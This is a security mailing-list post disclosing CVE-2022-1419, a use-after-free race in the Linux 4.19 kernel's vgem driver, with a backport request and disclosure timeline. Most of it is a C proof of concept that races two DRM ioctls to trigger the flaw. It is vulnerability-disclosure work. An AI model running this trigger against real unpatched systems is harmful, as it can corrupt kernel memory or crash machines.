oss-sec mailing list archives
CVE-2022-1419: Linux kernel: A concurrency use-after-free in vgem_gem_dumb_create
From: Minh Yuan <yuanmingbuaa () gmail com>
Date: Thu, 21 Apr 2022 23:44:54 +0800
Hi guys,
I recently discovered a race uaf in the latest 4.19.y kernel ( v4.19.239
for now ).
The root cause of this vulnerability is that the
ioctl$DRM_IOCTL_MODE_DESTROY_DUMB can decrease refcount of
*drm_vgem_gem_object *(created in *vgem_gem_dumb_create*) concurrently,
and *vgem_gem_dumb_create *will access the freed drm_vgem_gem_object.
I noticed that this race issue is fixed in commit 4b848f2 (drm/vgem: Close
use-after-free race in vgem_gem_create) for linux 5.x, so a backport to
4.19.y is needed ...
My unstable PoC (tested on Linux 4.19.239, it needs the privilege to access
drm to trigger this bug.)
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/xattr.h>
#include <sys/shm.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <drm/drm.h>
#include <drm/drm_mode.h>
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
int fd;
void *thread1(void *arg)
{
struct drm_mode_create_dumb *args = (struct drm_mode_create_dumb *)malloc(
sizeof(struct drm_mode_create_dumb));
memset(args,0,sizeof(struct drm_mode_create_dumb));
args->width = 10;
args->height = 10;
args->bpp = 1;
ioctl(fd, DRM_IOCTL_MODE_CREATE_DUMB, args);
}
void *thread2(void *arg)
{
struct drm_mode_destroy_dumb *args = (struct drm_mode_destroy_dumb *)malloc(
sizeof(struct drm_mode_destroy_dumb));
memset(args,0,sizeof( struct drm_mode_destroy_dumb));
args->handle = 1;
ioctl(fd, DRM_IOCTL_MODE_DESTROY_DUMB, args);
}
int main(void)
{
pthread_t thr1,thr2;
fd = open("/dev/dri/card0",0);
int s = pthread_create(&thr1,NULL,thread1,(void*)NULL);
if(s != 0)
errExit("pthread_create");
s = pthread_create(&thr2,NULL,thread2,(void*)NULL);
if(s != 0)
errExit("pthread_create");
pthread_join(thr1,NULL);
pthread_join(thr2,NULL);
close(fd);
}
Timeline:
* 21.04.22 - Vulnerability reported to security () kernel org and
linux-distros () vs openwall org
* 21.04.22 - CVE-2022-1419 assigned.
* 21.04.22 - Vulnerability opened.
Regards,
Yuan Ming from Tsinghua University
Current thread:
- CVE-2022-1419: Linux kernel: A concurrency use-after-free in vgem_gem_dumb_create Minh Yuan (Apr 21)
- Re: CVE-2022-1419: Linux kernel: A concurrency use-after-free in vgem_gem_dumb_create Greg KH (Apr 21)
- Re: CVE-2022-1419: Linux kernel: A concurrency use-after-free in vgem_gem_dumb_create Marcus Meissner (Apr 22)
- Re: CVE-2022-1419: Linux kernel: A concurrency use-after-free in vgem_gem_dumb_create Greg KH (Apr 21)